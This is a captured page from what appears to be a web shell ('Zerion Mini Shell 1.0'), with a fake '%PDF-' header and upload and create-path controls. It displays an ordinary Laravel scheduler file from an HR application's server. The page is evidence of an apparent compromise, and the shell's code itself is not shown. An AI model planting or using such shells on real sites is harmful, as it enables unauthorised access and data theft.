%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/hrsys/api/app/Console/
Upload File :
Create Path :
Current File : /var/www/html/hrsys/api/app/Console/Kernel.php

<?php

namespace App\Console;

use App\Console\Commands\AddYearlyHolidaysCommand;
use App\Console\Commands\CheckForUsersBirthdayCommand;
use App\Console\Commands\NotifyForDueMaintenancePaymentsCommand;
use App\Console\Commands\NotifyForMaintenancePaymentComingUpCommand;
use App\Console\Commands\NotifyManagersForTimecardApprovalsCommand;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        AddYearlyHolidaysCommand::class,
        CheckForUsersBirthdayCommand::class,
        NotifyForDueMaintenancePaymentsCommand::class,
        NotifyForMaintenancePaymentComingUpCommand::class,
        NotifyManagersForTimecardApprovalsCommand::class,
    ];

    /**
     * Define the application's command schedule.
     *
     * @param Schedule $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        $schedule->command('checkForUsersBirthdayCommand')
                 ->dailyAt('10:00');
        $schedule->command('notifyManagersForTimecardApprovalsCommand')
                 ->fridays()
                 ->at('16:00');
        $schedule->command('addYearlyHolidaysCommand')
                 ->yearly();
        $schedule->command('notifyForMaintenancePaymentComingUpCommand')
                 ->dailyAt('10:00');
        $schedule->command('notifyForDueMaintenancePaymentsCommand')
                 ->dailyAt('10:00');
    }

    /**
     * Register the commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        $this->load(__DIR__ . '/Commands');

        require base_path('routes/console.php');
    }
}

Zerion Mini Shell 1.0